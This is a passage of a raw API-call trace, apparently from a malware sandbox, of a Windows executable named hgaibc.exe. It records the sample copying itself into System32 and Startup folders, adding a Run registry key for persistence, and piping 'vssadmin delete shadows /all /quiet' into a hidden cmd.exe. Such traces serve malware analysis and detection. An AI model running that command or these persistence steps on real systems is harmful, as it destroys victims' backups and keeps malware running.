nSize=0x7fff | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe")) returned 0x22 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x637710 [0042.636] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x647718 [0042.637] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615288 [0042.637] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615288, Size=0x20) returned 0x60e9a8 [0042.637] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e9a8, Size=0x40) returned 0x5ea390 [0042.637] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea390, Size=0x80) returned 0x614738 [0042.637] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614738, Size=0x100) returned 0x615f40 [0042.637] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.637] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5d0000) returned 1 [0042.637] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\hgaibc.exe", lpDst=0x637710, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\System32\\hgaibc.exe") returned 0x1f [0042.637] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x647718 | out: hHeap=0x5d0000) returned 1 [0042.637] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x637710 | out: hHeap=0x5d0000) returned 1 [0042.638] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x249f020 [0042.641] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615330 [0042.641] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615330, Size=0x20) returned 0x60e908 [0042.641] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6153a8 [0042.641] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6153a8, Size=0x20) returned 0x60e9f8 [0042.641] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.641] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.641] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x0) returned 1 [0042.641] lstrlenW (lpString="kernel32.dll") returned 12 [0042.641] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e908 | out: hHeap=0x5d0000) returned 1 [0042.641] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.641] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e9f8 | out: hHeap=0x5d0000) returned 1 [0042.641] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x240 [0042.642] CreateFileW (lpFileName="C:\\WINDOWS\\System32\\hgaibc.exe" (normalized: "c:\\windows\\system32\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0042.643] ReadFile (in: hFile=0x240, lpBuffer=0x249f020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x249f020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.654] WriteFile (in: hFile=0x244, lpBuffer=0x249f020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x249f020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.660] ReadFile (in: hFile=0x240, lpBuffer=0x249f020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x249f020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0042.660] CloseHandle (hObject=0x244) returned 1 [0042.662] CloseHandle (hObject=0x240) returned 1 [0042.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615360 [0042.662] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615360, Size=0x20) returned 0x60e7a0 [0042.662] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615288 [0042.662] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615288, Size=0x20) returned 0x60ebb0 [0042.662] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.662] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.663] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0042.663] lstrlenW (lpString="kernel32.dll") returned 12 [0042.663] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ebb0 | out: hHeap=0x5d0000) returned 1 [0042.663] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.663] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7a0 | out: hHeap=0x5d0000) returned 1 [0042.663] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x249f020 | out: hHeap=0x5d0000) returned 1 [0042.667] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615438 [0042.667] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615438, Size=0x20) returned 0x60e890 [0042.667] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e890, Size=0x40) returned 0x5ea030 [0042.667] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea030, Size=0x80) returned 0x6140d8 [0042.667] lstrlenW (lpString="C:\\WINDOWS\\System32\\hgaibc.exe") returned 30 [0042.667] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0042.667] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5c) returned 0x5e7cb0 [0042.667] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x19fd64 | out: phkResult=0x19fd64*=0x240) returned 0x0 [0042.667] RegSetValueExW (in: hKey=0x240, lpValueName="hgaibc.exe", Reserved=0x0, dwType=0x1, lpData="C:\\WINDOWS\\System32\\hgaibc.exe", cbData=0x3c | out: lpData="C:\\WINDOWS\\System32\\hgaibc.exe") returned 0x0 [0042.668] RegCloseKey (hKey=0x240) returned 0x0 [0042.668] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e7cb0 | out: hHeap=0x5d0000) returned 1 [0042.668] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0042.668] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6140d8 | out: hHeap=0x5d0000) returned 1 [0042.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x637710 [0042.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x647718 [0042.668] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615240 [0042.668] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615240, Size=0x20) returned 0x60e8e0 [0042.668] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e8e0, Size=0x40) returned 0x5ea150 [0042.668] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea150, Size=0x80) returned 0x6148d0 [0042.668] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6148d0, Size=0x100) returned 0x615f40 [0042.668] lstrlenW (lpString="") returned 0 [0042.668] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.669] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x616048 [0042.669] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x240) returned 0x0 [0042.669] RegQueryValueExW (in: hKey=0x240, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x647718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x0, lpData=0x647718*=0x53, lpcbData=0x19fd48*=0x7fff) returned 0x2 [0042.669] RegCloseKey (hKey=0x240) returned 0x0 [0042.669] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616048 | out: hHeap=0x5d0000) returned 1 [0042.669] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.669] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x616048 [0042.669] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0042.670] RegQueryValueExW (in: hKey=0x244, lpValueName="Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x647718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x98) returned 0x0 [0042.670] RegCloseKey (hKey=0x244) returned 0x0 [0042.670] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616048 | out: hHeap=0x5d0000) returned 1 [0042.670] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0042.670] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.670] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5d0000) returned 1 [0042.670] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x637710, nSize=0x7fff | out: lpDst="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x59 [0042.670] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x647718 | out: hHeap=0x5d0000) returned 1 [0042.670] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x637710 | out: hHeap=0x5d0000) returned 1 [0042.671] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x2496020 [0042.674] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615450 [0042.674] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615450, Size=0x20) returned 0x60e7a0 [0042.674] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6151c8 [0042.674] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6151c8, Size=0x20) returned 0x60ebb0 [0042.674] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.674] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.674] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0042.675] lstrlenW (lpString="kernel32.dll") returned 12 [0042.675] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7a0 | out: hHeap=0x5d0000) returned 1 [0042.675] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.675] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ebb0 | out: hHeap=0x5d0000) returned 1 [0042.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0042.675] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0042.678] ReadFile (in: hFile=0x244, lpBuffer=0x2496020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2496020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.689] WriteFile (in: hFile=0x248, lpBuffer=0x2496020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2496020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.692] ReadFile (in: hFile=0x244, lpBuffer=0x2496020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2496020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0042.692] CloseHandle (hObject=0x248) returned 1 [0042.705] CloseHandle (hObject=0x244) returned 1 [0042.705] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6153f0 [0042.705] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6153f0, Size=0x20) returned 0x60e7a0 [0042.705] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615330 [0042.705] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615330, Size=0x20) returned 0x60e930 [0042.705] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.705] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.705] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0042.705] lstrlenW (lpString="kernel32.dll") returned 12 [0042.705] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e930 | out: hHeap=0x5d0000) returned 1 [0042.705] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.706] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7a0 | out: hHeap=0x5d0000) returned 1 [0042.706] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2496020 | out: hHeap=0x5d0000) returned 1 [0042.710] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x637710 [0042.710] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x647718 [0042.710] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615300 [0042.710] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615300, Size=0x20) returned 0x60ebb0 [0042.710] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ebb0, Size=0x40) returned 0x5ea108 [0042.710] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea108, Size=0x80) returned 0x614848 [0042.710] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614848, Size=0x100) returned 0x615f40 [0042.710] lstrlenW (lpString="") returned 0 [0042.711] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.711] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x616048 [0042.711] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x19fd10 | out: phkResult=0x19fd10*=0x244) returned 0x0 [0042.711] RegQueryValueExW (in: hKey=0x244, lpValueName="Common Startup", lpReserved=0x0, lpType=0x19fd1c, lpData=0x647718, lpcbData=0x19fd48*=0x7fff | out: lpType=0x19fd1c*=0x2, lpData="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x19fd48*=0x78) returned 0x0 [0042.711] RegCloseKey (hKey=0x244) returned 0x0 [0042.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x616048 | out: hHeap=0x5d0000) returned 1 [0042.711] lstrlenW (lpString="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 59 [0042.711] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5d0000) returned 1 [0042.711] ExpandEnvironmentStringsW (in: lpSrc="%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe", lpDst=0x637710, nSize=0x7fff | out: lpDst="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe") returned 0x48 [0042.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x647718 | out: hHeap=0x5d0000) returned 1 [0042.711] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x637710 | out: hHeap=0x5d0000) returned 1 [0042.712] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x2498020 [0042.714] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615360 [0042.714] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615360, Size=0x20) returned 0x60e818 [0042.714] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6153d8 [0042.714] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6153d8, Size=0x20) returned 0x60ea70 [0042.714] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.715] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.715] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0042.715] lstrlenW (lpString="kernel32.dll") returned 12 [0042.715] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e818 | out: hHeap=0x5d0000) returned 1 [0042.715] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.715] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60ea70 | out: hHeap=0x5d0000) returned 1 [0042.715] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\hgaibc.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\hgaibc.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x244 [0042.715] CreateFileW (lpFileName="C:\\ProgramData\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\hgaibc.exe" (normalized: "c:\\programdata\\microsoft\\windows\\start menu\\programs\\startup\\hgaibc.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x248 [0042.906] ReadFile (in: hFile=0x244, lpBuffer=0x2498020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2498020*, lpNumberOfBytesRead=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.915] WriteFile (in: hFile=0x248, lpBuffer=0x2498020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2498020*, lpNumberOfBytesWritten=0x19fd90*=0x17200, lpOverlapped=0x0) returned 1 [0042.917] ReadFile (in: hFile=0x244, lpBuffer=0x2498020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x19fd90, lpOverlapped=0x0 | out: lpBuffer=0x2498020*, lpNumberOfBytesRead=0x19fd90*=0x0, lpOverlapped=0x0) returned 1 [0042.917] CloseHandle (hObject=0x248) returned 1 [0042.919] CloseHandle (hObject=0x244) returned 1 [0042.919] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615240 [0042.919] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615240, Size=0x20) returned 0x60e8e0 [0042.919] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615420 [0042.919] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615420, Size=0x20) returned 0x60e7f0 [0042.919] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75e90000 [0042.919] GetProcAddress (hModule=0x75e90000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x75ea6b30 [0042.919] Wow64DisableWow64FsRedirection (in: OldValue=0x19fd94 | out: OldValue=0x19fd94*=0x1) returned 1 [0042.919] lstrlenW (lpString="kernel32.dll") returned 12 [0042.919] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e7f0 | out: hHeap=0x5d0000) returned 1 [0042.920] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0042.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e8e0 | out: hHeap=0x5d0000) returned 1 [0042.920] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x2498020 | out: hHeap=0x5d0000) returned 1 [0042.924] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x617700 | out: hHeap=0x5d0000) returned 1 [0042.925] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x627708 | out: hHeap=0x5d0000) returned 1 [0042.926] lstrlenW (lpString="%windir%\\System32") returned 17 [0042.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5ea420 | out: hHeap=0x5d0000) returned 1 [0042.926] lstrlenW (lpString="%appdata%") returned 9 [0042.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e958 | out: hHeap=0x5d0000) returned 1 [0042.926] lstrlenW (lpString="%sh(Startup)%") returned 13 [0042.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60eb10 | out: hHeap=0x5d0000) returned 1 [0042.926] lstrlenW (lpString="%sh(Common Startup)%") returned 20 [0042.926] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e9fa0 | out: hHeap=0x5d0000) returned 1 [0042.926] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x6151e0 [0042.926] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x6151e0, Size=0x20) returned 0x60ebb0 [0042.926] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60ebb0, Size=0x40) returned 0x5ea150 [0042.926] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea150, Size=0x80) returned 0x614738 [0042.926] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615318 [0042.926] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615318, Size=0x20) returned 0x60e958 [0042.926] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1fffc) returned 0x617700 [0042.927] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x637708 [0042.927] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x647710 [0042.927] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x615300 [0042.927] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x615300, Size=0x20) returned 0x60e7a0 [0042.927] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x60e7a0, Size=0x40) returned 0x5ea6f0 [0042.927] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5ea6f0, Size=0x80) returned 0x614160 [0042.927] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x614160, Size=0x100) returned 0x615f40 [0042.927] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0042.927] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x615f40 | out: hHeap=0x5d0000) returned 1 [0042.927] ExpandEnvironmentStringsW (in: lpSrc="%comspec%", lpDst=0x637708, nSize=0x7fff | out: lpDst="C:\\WINDOWS\\system32\\cmd.exe") returned 0x1c [0042.927] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x647710 | out: hHeap=0x5d0000) returned 1 [0042.928] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x637708 | out: hHeap=0x5d0000) returned 1 [0042.929] CreatePipe (in: hReadPipe=0x19fd50, hWritePipe=0x19fd54, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fd50*=0x248, hWritePipe=0x19fd54*=0x24c) returned 1 [0042.929] CreatePipe (in: hReadPipe=0x19fdc0, hWritePipe=0x19fdc4, lpPipeAttributes=0x19fd40, nSize=0x0 | out: hReadPipe=0x19fdc0*=0x250, hWritePipe=0x19fdc4*=0x254) returned 1 [0042.929] SetHandleInformation (hObject=0x24c, dwMask=0x1, dwFlags=0x0) returned 1 [0042.931] SetHandleInformation (hObject=0x250, dwMask=0x1, dwFlags=0x0) returned 1 [0042.931] CreateProcessW (in: lpApplicationName="C:\\WINDOWS\\system32\\cmd.exe", lpCommandLine=0x0, lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x19fd60*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x101, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x248, hStdOutput=0x254, hStdError=0x254), lpProcessInformation=0x19fdb0 | out: lpCommandLine=0x0, lpProcessInformation=0x19fdb0*(hProcess=0x25c, hThread=0x258, dwProcessId=0xf8c, dwThreadId=0xf64)) returned 1 [0043.289] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0043.289] WriteFile (in: hFile=0x24c, lpBuffer=0x614738*, nNumberOfBytesToWrite=0x41, lpNumberOfBytesWritten=0x19fd5c, lpOverlapped=0x0 | out: lpBuffer=0x614738*, lpNumberOfBytesWritten=0x19fd5c*=0x41, lpOverlapped=0x0) returned 1 [0043.289] CloseHandle (hObject=0x25c) returned 1 [0043.289] CloseHandle (hObject=0x258) returned 1 [0043.289] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x617700 | out: hHeap=0x5d0000) returned 1 [0043.289] lstrlenA (lpString="mode con cp select=1251\nvssadmin delete shadows /all /quiet\nExit\n") returned 65 [0043.289] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x614738 | out: hHeap=0x5d0000) returned 1 [0043.289] lstrlenW (lpString="%comspec%") returned 9 [0043.289] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x60e958 | out: hHeap=0x5d0000) returned 1 [0043.289] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x40a530, lpParameter=0x0, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x258 [0043.290] 